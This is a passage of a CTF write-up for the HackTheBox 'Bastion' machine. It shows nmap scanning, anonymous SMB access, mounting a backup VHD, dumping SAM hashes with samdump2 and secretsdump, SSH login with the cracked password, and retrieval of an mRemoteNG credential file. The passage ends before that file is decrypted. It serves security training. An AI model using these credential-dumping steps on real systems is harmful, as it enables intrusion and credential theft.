[New post] HackTheBox : Bastion Writeup – ETHICAL HACKING

Matteo posted: " [*] HTB Bastion Writeup HackTheBox Bastion – Today we are solving another HTB Machine – Bastion , and will learn some cool hacking/ CTF stuffs. As always we run a minimal nmap scan. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basi" New post on Matteo Sala HackTheBox : Bastion Writeup – ETHICAL HACKING by Matteo [*] HTB Bastion Writeup HackTheBox Bastion – Today we are solving another HTB Machine – Bastion , and will learn some cool hacking/ CTF stuffs. As always we run a minimal nmap scan. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ nmap bastion.htb Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:13 IST Nmap scan report for bastion.htb (10.10.10.134) Host is up (0.17s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds and from the initial scan , lets scan the mentioned ports only for more information. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo nmap -sV -sC -A -O -p22,135,139,445 bastion.htb -oA bastion -vv [sudo] password for abhinav: Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 19:15 IST NSE: Loaded 153 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed Initiating Ping Scan at 19:15 Scanning bastion.htb (10.10.10.134) [4 ports] Completed Ping Scan at 19:15, 0.23s elapsed (1 total hosts) Initiating SYN Stealth Scan at 19:15 Scanning bastion.htb (10.10.10.134) [4 ports] Discovered open port 135/tcp on 10.10.10.134 Discovered open port 22/tcp on 10.10.10.134 Discovered open port 445/tcp on 10.10.10.134 Discovered open port 139/tcp on 10.10.10.134 Completed SYN Stealth Scan at 19:15, 0.27s elapsed (4 total ports) Initiating Service scan at 19:15 Scanning 4 services on bastion.htb (10.10.10.134) Completed Service scan at 19:15, 6.71s elapsed (4 services on 1 host) Initiating OS detection (try #1) against bastion.htb (10.10.10.134) Retrying OS detection (try #2) against bastion.htb (10.10.10.134) Initiating Traceroute at 19:15 Completed Traceroute at 19:15, 0.19s elapsed Initiating Parallel DNS resolution of 1 host. at 19:15 Completed Parallel DNS resolution of 1 host. at 19:15, 0.03s elapsed NSE: Script scanning 10.10.10.134. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 12.47s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed Nmap scan report for bastion.htb (10.10.10.134) Host is up, received echo-reply ttl 127 (0.18s latency). Scanned at 2021-07-20 19:15:33 IST for 24s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3 | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg= | 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.91%E=4%D=7/20%OT=22%CT=%CU=34383%PV=Y%DS=2%DC=T%G=N%TM=60F6D395%P=x86_64-pc-linux-gnu) SEQ(SP=108%GCD=1%ISR=10E%TI=I%CI=I%II=I%SS=S%TS=A) OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11) WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000) ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=) T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=) T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=) T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=) T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(R=Y%DFI=N%T=80%CD=Z) Uptime guess: 0.005 days (since Tue Jul 20 19:09:08 2021) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=264 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -38m18s, deviation: 1h09m14s, median: 1m39s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 9831/tcp): CLEAN (Couldn't connect) | Check 2 (port 26941/tcp): CLEAN (Couldn't connect) | Check 3 (port 57335/udp): CLEAN (Failed to receive data) | Check 4 (port 18741/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTIONx00 | Workgroup: WORKGROUPx00 |_ System time: 2021-07-20T15:47:29+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-20T13:47:26 |_ start_date: 2021-07-20T13:41:01 TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 175.65 ms 10.10.14.1 2 176.04 ms bastion.htb (10.10.10.134) NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 19:15 Completed NSE at 19:15, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds Raw packets sent: 50 (3.604KB) | Rcvd: 49 (3.436KB) ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ We see some interesting information in the nmap detailed scan, we have SSH, SMB, Windows Server 2016 and more. I think for me and everyone else , SMB is most exciting piece to check first most of the times. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ smbclient --list //bastion.htb/ -U "" Enter WORKGROUP's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Backups Disk C$ Disk Default share IPC$ IPC Remote IPC SMB1 disabled -- no workgroup available From the above we can infer we should focus on bakups folder. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ smbclient //bastion.htb/Backups -U "" Enter WORKGROUP's password: Try "help" to get a list of possible commands. smb: > ls . D 0 Tue Apr 16 15:32:11 2019 .. D 0 Tue Apr 16 15:32:11 2019 note.txt AR 116 Tue Apr 16 15:40:09 2019 SDT65CB.tmp A 0 Fri Feb 22 18:13:08 2019 WindowsImageBackup Dn 0 Fri Feb 22 18:14:02 2019 7735807 blocks of size 4096. 2763249 blocks available smb: > get note.txt getting file note.txt of size 116 as note.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) The interesting entries are note.txt which we will fetch using get in smb( above snip), WindowsImageBackup would be too large usually over the vpn. Content of note.txt are below ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ ls | grep note note.txt ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ cat note.txt Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow. So the other piece if information is the WindowsImageBackup, let see more into that. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ smbclient //bastion.htb/Backups -U "" 130 ⨯ Enter WORKGROUP's password: Try "help" to get a list of possible commands. smb: > ls . D 0 Tue Apr 16 15:32:11 2019 .. D 0 Tue Apr 16 15:32:11 2019 note.txt AR 116 Tue Apr 16 15:40:09 2019 SDT65CB.tmp A 0 Fri Feb 22 18:13:08 2019 WindowsImageBackup Dn 0 Fri Feb 22 18:14:02 2019 7735807 blocks of size 4096. 2747596 blocks available smb: > cd WindowsImageBackup smb: WindowsImageBackup> ls . Dn 0 Fri Feb 22 18:14:02 2019 .. Dn 0 Fri Feb 22 18:14:02 2019 L4mpje-PC Dn 0 Fri Feb 22 18:15:32 2019 7735807 blocks of size 4096. 2747596 blocks available smb: WindowsImageBackup> cd L4mpje-PC smb: WindowsImageBackupL4mpje-PC> ls . Dn 0 Fri Feb 22 18:15:32 2019 .. Dn 0 Fri Feb 22 18:15:32 2019 Backup 2019-02-22 124351 Dn 0 Fri Feb 22 18:15:32 2019 Catalog Dn 0 Fri Feb 22 18:15:32 2019 MediaId An 16 Fri Feb 22 18:14:02 2019 SPPMetadataCache Dn 0 Fri Feb 22 18:15:32 2019 7735807 blocks of size 4096. 2747596 blocks available smb: WindowsImageBackupL4mpje-PC> cd "Backup 2019-02-22 124351" smb: WindowsImageBackupL4mpje-PCBackup 2019-02-22 124351> ls . Dn 0 Fri Feb 22 18:15:32 2019 .. Dn 0 Fri Feb 22 18:15:32 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 18:14:03 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 18:15:32 2019 BackupSpecs.xml An 1186 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 18:15:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 18:15:32 2019 7735807 blocks of size 4096. 2747596 blocks available smb: WindowsImageBackupL4mpje-PCBackup 2019-02-22 124351> Lets mount one of these vhd(s) to our local machine as we clearly read in notes downloading is not an option. We will use qemu-utils which can be installed if not already ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo apt-get install qemu-utils [sudo] password for abhinav: Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer required: linux-image-5.10.0-kali3-amd64 python3-gevent python3-gevent-websocket python3-greenlet python3-jupyter-core python3-m2crypto python3-nbformat python3-parameterized python3-plotly python3-zope.event Use 'sudo apt autoremove' to remove them. Suggested packages: debootstrap qemu-block-extra The following NEW packages will be installed: qemu-utils 0 upgraded, 1 newly installed, 0 to remove and 28 not upgraded. Need to get 1,205 kB of archives. After this operation, 6,224 kB of additional disk space will be used. Get:1 https://hlzmel.fsmg.org.nz/kali kali-rolling/main amd64 qemu-utils amd64 1:5.2+dfsg-10+b2 [1,205 kB] Fetched 1,205 kB in 8s (158 kB/s) Selecting previously unselected package qemu-utils. (Reading database ... 385831 files and directories currently installed.) Preparing to unpack .../qemu-utils_1%3a5.2+dfsg-10+b2_amd64.deb ... Unpacking qemu-utils (1:5.2+dfsg-10+b2) ... Setting up qemu-utils (1:5.2+dfsg-10+b2) ... Processing triggers for man-db (2.9.4-2) ... Processing triggers for kali-menu (2021.2.3) ... ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ Lets mount vhd – 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd now, you can search for how to do this. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo mkdir /mnt/L4mpje-PC [sudo] password for abhinav: ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo mkdir /mnt/vhd ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo modprobe nbd 1 ⨯ ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo mount -t cifs //bastion.htb/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous Password for anonymous@//bastion.htb/Backups/WindowsImageBackup/L4mpje-PC: ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" 1 ⨯ ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ sudo mount -r /dev/nbd0p1 /mnt/vhd ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ Now that the vhd 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd is mounted, we can see the contents of this . $ cd /mnt/vhd ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd] └─$ ls -la total 2096745 drwxrwxrwx 1 root root 12288 Feb 22 2019 . drwxr-xr-x 4 root root 4096 Jul 21 01:04 .. drwxrwxrwx 1 root root 0 Feb 22 2019 '$Recycle.Bin' -rwxrwxrwx 1 root root 24 Jun 11 2009 autoexec.bat -rwxrwxrwx 1 root root 10 Jun 11 2009 config.sys lrwxrwxrwx 2 root root 14 Jul 14 2009 'Documents and Settings' -> /mnt/vhd/Users -rwxrwxrwx 1 root root 2147016704 Feb 22 2019 pagefile.sys drwxrwxrwx 1 root root 0 Jul 14 2009 PerfLogs drwxrwxrwx 1 root root 4096 Jul 14 2009 ProgramData drwxrwxrwx 1 root root 4096 Apr 12 2011 'Program Files' drwxrwxrwx 1 root root 0 Feb 22 2019 Recovery drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information' drwxrwxrwx 1 root root 4096 Feb 22 2019 Users drwxrwxrwx 1 root root 16384 Feb 22 2019 Windows Dumb me tried to search for the user flag but no luck, however the output of few folders were as below. ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd] └─$ cd Users ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users] └─$ ls 'All Users' Default 'Default User' desktop.ini L4mpje Public ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users] └─$ cd L4mpje ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje] └─$ ls AppData Documents Music NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms Pictures SendTo 'Application Data' Downloads 'My Documents' NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms PrintHood 'Start Menu' Contacts Favorites NetHood ntuser.dat.LOG1 Recent Templates Cookies Links NTUSER.DAT ntuser.dat.LOG2 'Saved Games' Videos Desktop 'Local Settings' NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf ntuser.ini Searches ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje] └─$ cd Desktop ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop] └─$ ls desktop.ini ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Desktop] └─$ cd .. ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje] └─$ cd Documents ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents] └─$ ls desktop.ini 'My Music' 'My Pictures' 'My Videos' ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Users/L4mpje/Documents] └─$ cd .. When on Windows box, it is crime not to see config folder in system32 to see if we can get hold of any users, or hashes, so let's get there . ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd] └─$ cd Windows/System32/config/ ┌──(abhinav㉿ETHICALHACKX)-[/mnt/vhd/Windows/System32/config] └─$ ls -la total 74740 drwxrwxrwx 1 root root 12288 Feb 22 2019 . drwxrwxrwx 1 root root 655360 Feb 22 2019 .. -rwxrwxrwx 2 root root 28672 Feb 23 2019 BCD-Template -rwxrwxrwx 2 root root 25600 Feb 23 2019 BCD-Template.LOG -rwxrwxrwx 2 root root 30932992 Feb 22 2019 COMPONENTS -rwxrwxrwx 2 root root 1048576 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms -rwxrwxrwx 2 root root 1048576 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms -rwxrwxrwx 2 root root 1048576 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms -rwxrwxrwx 2 root root 65536 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf -rwxrwxrwx 2 root root 65536 Feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf -rwxrwxrwx 2 root root 524288 Feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms -rwxrwxrwx 2 root root 524288 Jul 14 2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms -rwxrwxrwx 2 root root 1024 Apr 12 2011 COMPONENTS.LOG -rwxrwxrwx 2 root root 262144 Feb 22 2019 COMPONENTS.LOG1 -rwxrwxrwx 2 root root 0 Jul 14 2009 COMPONENTS.LOG2 -rwxrwxrwx 1 root root 262144 Feb 22 2019 DEFAULT -rwxrwxrwx 1 root root 1024 Apr 12 2011 DEFAULT.LOG -rwxrwxrwx 2 root root 91136 Feb 22 2019 DEFAULT.LOG1 -rwxrwxrwx 2 root root 0 Jul 14 2009 DEFAULT.LOG2 drwxrwxrwx 1 root root 0 Jul 14 2009 Journal drwxrwxrwx 1 root root 0 Feb 22 2019 RegBack -rwxrwxrwx 1 root root 262144 Feb 22 2019 SAM -rwxrwxrwx 1 root root 1024 Apr 12 2011 SAM.LOG -rwxrwxrwx 2 root root 21504 Feb 22 2019 SAM.LOG1 -rwxrwxrwx 2 root root 0 Jul 14 2009 SAM.LOG2 -rwxrwxrwx 1 root root 262144 Feb 22 2019 SECURITY -rwxrwxrwx 1 root root 1024 Apr 12 2011 SECURITY.LOG -rwxrwxrwx 2 root root 21504 Feb 22 2019 SECURITY.LOG1 -rwxrwxrwx 2 root root 0 Jul 14 2009 SECURITY.LOG2 -rwxrwxrwx 1 root root 24117248 Feb 22 2019 SOFTWARE -rwxrwxrwx 1 root root 1024 Apr 12 2011 SOFTWARE.LOG -rwxrwxrwx 2 root root 262144 Feb 22 2019 SOFTWARE.LOG1 -rwxrwxrwx 2 root root 0 Jul 14 2009 SOFTWARE.LOG2 -rwxrwxrwx 1 root root 9699328 Feb 22 2019 SYSTEM -rwxrwxrwx 1 root root 1024 Apr 12 2011 SYSTEM.LOG -rwxrwxrwx 2 root root 262144 Feb 22 2019 SYSTEM.LOG1 -rwxrwxrwx 2 root root 0 Jul 14 2009 SYSTEM.LOG2 drwxrwxrwx 1 root root 4096 Nov 21 2010 systemprofile drwxrwxrwx 1 root root 4096 Feb 22 2019 TxR As we can read, so let's get the dump of SAM and SYSTEM to see more, we can do so using samdump. ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ cp /mnt/vhd/Windows/System32/config/SYSTEM . ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ cp /mnt/vhd/Windows/System32/config/SAM . ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ ls bastion.gnmap bastion.nmap bastion.xml note.txt SAM SYSTEM Lets use samdump ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ samdump2 ./SYSTEM ./SAM 255 ⨯ *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: We already have some information we were looking for but another tool to do same can be Secretsdump ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ secretsdump.py LOCAL -system ./SYSTEM -sam ./SAM Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation [*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: [*] Cleaning up... You can use your favourite hash cracker or online repos to uncover the hash for L4mpje crackstation got some hash uncovered So have some juicy information L4mpje : bureaulampje , next what ? SSH ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ ssh L4mpje@bastion.htb The authenticity of host 'bastion.htb (10.10.10.134)' can't be established. ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY. Are you sure you want to continue connecting (yes/no/[fingerprint])? Yes Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts. L4mpje@bastion.htb's password: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. l4mpje@BASTION C:UsersL4mpje>cd Desktop l4mpje@BASTION C:UsersL4mpjeDesktop>ls 'ls' is not recognized as an internal or external command, operable program or batch file. l4mpje@BASTION C:UsersL4mpjeDesktop>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:UsersL4mpjeDesktop 22-02-2019 16:27 <DIR> . 22-02-2019 16:27 <DIR> .. 23-02-2019 10:07 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 11.295.985.664 bytes free l4mpje@BASTION C:UsersL4mpjeDesktop>type user.txt 9bfe57d5c3309db3a151772f9d86c6cd l4mpje@BASTION C:UsersL4mpjeDesktop> So we now have user flag in the usual path (Desktop/user.txt). Lets try to get the root.txt Privilege Escalation traversing some directories we notice something interesting, l4mpje@BASTION C:UsersL4mpjeDesktop>cd .. l4mpje@BASTION C:UsersL4mpje>cd appdata l4mpje@BASTION C:UsersL4mpjeAppData>cd roaming l4mpje@BASTION C:UsersL4mpjeAppDataRoaming>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:UsersL4mpjeAppDataRoaming 22-02-2019 15:01 <DIR> . 22-02-2019 15:01 <DIR> .. 22-02-2019 14:50 <DIR> Adobe 22-02-2019 15:03 <DIR> mRemoteNG 0 File(s) 0 bytes 4 Dir(s) 11.295.985.664 bytes free l4mpje@BASTION C:UsersL4mpjeAppDataRoaming> mRemoteNG is an interesting entry , is an open-source software fork of mRemote , this saves information in confCons.xml that we can locate and analyze. l4mpje@BASTION C:UsersL4mpjeAppDataRoaming>cd mRemoteNG l4mpje@BASTION C:UsersL4mpjeAppDataRoamingmRemoteNG>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:UsersL4mpjeAppDataRoamingmRemoteNG 22-02-2019 15:03 <DIR> . 22-02-2019 15:03 <DIR> .. 22-02-2019 15:03 6.316 confCons.xml 22-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup 22-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup 22-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup 22-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup 22-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup 22-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup 22-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup 22-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup 22-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup 22-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup 22-02-2019 15:03 51 extApps.xml 22-02-2019 15:03 5.217 mRemoteNG.log 22-02-2019 15:03 2.245 pnlLayout.xml 22-02-2019 15:01 <DIR> Themes 14 File(s) 76.577 bytes 3 Dir(s) 11.295.985.664 bytes free l4mpje@BASTION C:UsersL4mpjeAppDataRoamingmRemoteNG> Lets use scp to get the confCons.xml ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ scp l4mpje@bastion.htb:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml . l4mpje@bastion.htb's password: confCons.xml 100% 6316 38.2KB/s 00:00 ┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton] └─$ cat confCons.xml <?xml version="1.0" encoding="utf-8"?> <mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6"> <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" 